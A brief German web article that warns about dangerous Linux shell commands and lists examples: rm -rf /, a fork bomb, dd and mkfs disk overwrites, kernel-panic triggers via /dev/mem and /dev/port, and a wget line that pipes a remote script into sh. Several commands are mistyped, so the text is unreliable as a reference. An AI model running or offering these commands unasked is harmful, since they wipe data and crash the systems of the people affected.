Diese Linux-Befehle sind gefährlich

Die Kommandozeile bei unixoxiden Systemen ist ein sehr umfangreiches Werkzeug.

Allerding muss man aufpassen, manche Kommandos schaden mehr als sie nutzen. Mit ein paar scheinbar harmlosen Zeichen kann man den kompletten Inhalt der Festplatte vernichten.

Die Befehle unten sollten nur mit Bedacht ausgeführt werden.

Eine isolierte, virtuelle Maschine eignet sich am Besten dafür.

Rekursives Löschen

rm -rf /

Fork-Bombe zünden

:(){ :|:& };:

Festplatte mit Zufallszahlen überschreiben

dd if=/dev/random of=/dev/sda

Home-Verzeichnis im Schwarzen Loch versenken

mv ~ /dev/null

Skript aus nicht vertrauenswürdiger Quelle laden und ausführen

wget http://example.org/script.sh -O | sh

Festplatte formatieren

Mkfs.ext3 / dev / sda

Festplatte überschreiben

command > /dev/hda

Kernel Panic provozieren

dd if=/dev/random of=/dev/port

echo 1 > /proc/sys/kernel/panic

cat /dev/port

cat /dev/zero > /dev/mem

Kommentar verfassen